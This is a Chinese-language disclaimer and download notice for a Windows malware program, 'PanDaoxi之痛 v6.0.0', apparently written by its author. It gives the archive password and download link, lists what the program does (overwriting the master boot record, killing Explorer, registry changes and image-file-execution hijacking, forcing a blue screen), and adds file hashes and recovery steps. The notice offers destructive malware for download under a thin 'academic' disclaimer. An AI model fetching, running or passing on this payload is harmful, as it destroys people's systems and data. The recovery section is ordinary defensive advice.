﻿免责声明

压缩包内含有恶意程序。请注意，这并不是一个笑话，运行之后会破坏计算机的引导，可能会导致您的数据丢失或损害。
当然，开发此程序的目的是为了学术交流，欣赏计算机程序带来的美感。

如果您执意要运行程序，请保证在安全的环境下运行，丢失的数据与作者无关。
如果您运用此程序对他人的数据安全造成损害，与作者无关。
如果您将此程序用于非法手段，请立即删除；造成的不良影响与作者无关。

如果您全部知晓，并继续要运行此程序，那么：
压缩包密码：pandaoxi
压缩包下载地址：https://pandaoxi.github.io/websites/THE_PAIN_OF_PANDAOXI_6.0.0.zip
文件名称：PanDaoxi之痛_v6.0.0.exe
推荐执行环境：Windows 7 x64（或更高级的 Windows 环境）

=======================================================================================================

病毒运行症状：
- 运行前 30 秒，后台篡改系统主引导记录（MBR），使计算机无法启动；计算机仍可正常使用
- 杀死 文件资源管理器（Explorer） 的进程，并弹出记事本
- 此后将修改注册表：禁用系统功能、映像劫持 等
- 运行特效程序、进一步破坏计算机
- 触发蓝屏

我们建议您对压缩包内的文件进行校验。
此程序的校验信息如下：

+---------------------------------------------------------------+
|	大小	|	1730560 字节				|
|---------------+-----------------------------------------------|
|	修改时间|	2023年6月18日, 8:13:18			|
|---------------+-----------------------------------------------|
|	MD5	|	A5787CC8C681FB369166A75B534A186B	|
|---------------+-----------------------------------------------|
|	SHA1	|	7C389E443ABC063A6624DFCF1F4B0EA460E3CB53|
|---------------+-----------------------------------------------|
|	CRC32	|	8258E89C				|
+---------------------------------------------------------------+

对于修复方法，我们通常建议的修复步骤如下：
- 进入 PE 系统：
	1. 修复引导（MBR）
	2. 修改用户密码
	3. 操作注册表，加载 SOFTWARE 配置单元：
		i. 删除 映像劫持 相关内容
		ii.删除自启动项目
	4. 重新启动计算机
- 进入原操作系统
	1. 通过 组策略编辑器（gpedit.msc） 允许访问注册表
	2. 通过 inf、bat 等格式直接打开或使用 REG 命令修复注册表，删除相关内容
	3. 恢复壁纸、清理病毒释放的文件
	4. 可以使用杀毒软件进行修复
- 修复完成

综上所述，希望您使用愉快！

PanDaoxi
网站：https://daoxi365.netlify.app/
2023年6月18日